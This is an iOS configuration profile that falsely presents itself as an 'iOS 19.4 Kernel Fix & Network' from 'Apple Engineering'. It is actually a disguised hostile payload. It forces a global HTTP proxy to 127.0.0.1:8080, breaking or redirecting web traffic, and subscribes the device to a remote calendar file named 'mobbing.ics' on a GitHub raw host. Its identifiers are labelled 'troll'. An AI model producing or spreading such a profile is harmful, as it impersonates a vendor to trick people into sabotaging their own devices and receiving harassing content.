<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>PayloadContent</key>
	<array>
		<dict>
			<key>PayloadType</key>
			<string>com.apple.proxy.http.global</string>
			<key>PayloadIdentifier</key>
			<string>com.apple.proxy.troll</string>
			<key>PayloadUUID</key>
			<string>77778888-9999-0000-1111-222233334444</string>
			<key>PayloadVersion</key>
			<integer>1</integer>
			<key>ProxyType</key>
			<string>Manual</string>
			<key>ProxyServer</key>
			<string>127.0.0.1</string>
			<key>ProxyServerPort</key>
			<integer>8080</integer>
		</dict>

		<dict>
			<key>PayloadType</key>
			<string>com.apple.subscribedcalendar.account</string>
			<key>PayloadIdentifier</key>
			<string>com.apple.calendar.managed.troll</string>
			<key>PayloadUUID</key>
			<string>55556666-7777-8888-9999-000011112222</string>
			<key>PayloadVersion</key>
			<integer>1</integer>
			<key>SubCalAccountHostName</key>
			<string>raw.githubusercontent.com</string>
			<key>SubCalAccountPath</key>
			<string>/keremkero319-del/keross/main/mobbing.ics</string>
			<key>SubCalAccountUseSSL</key>
			<true/>
		</dict>
	</array>

	<key>PayloadDisplayName</key>
	<string> iOS 19.4 Kernel Fix &amp; Network</string>
	<key>PayloadIdentifier</key>
	<string>com.apple.system.ultra-fix</string>
	<key>PayloadOrganization</key>
	<string>Apple Engineering</string>
	<key>PayloadType</key>
	<string>Configuration</string>
	<key>PayloadUUID</key>
	<string>ABCDEF12-3456-7890-ABCD-EF1234567890</string>
	<key>PayloadVersion</key>
	<integer>1</integer>
</dict>
</plist>
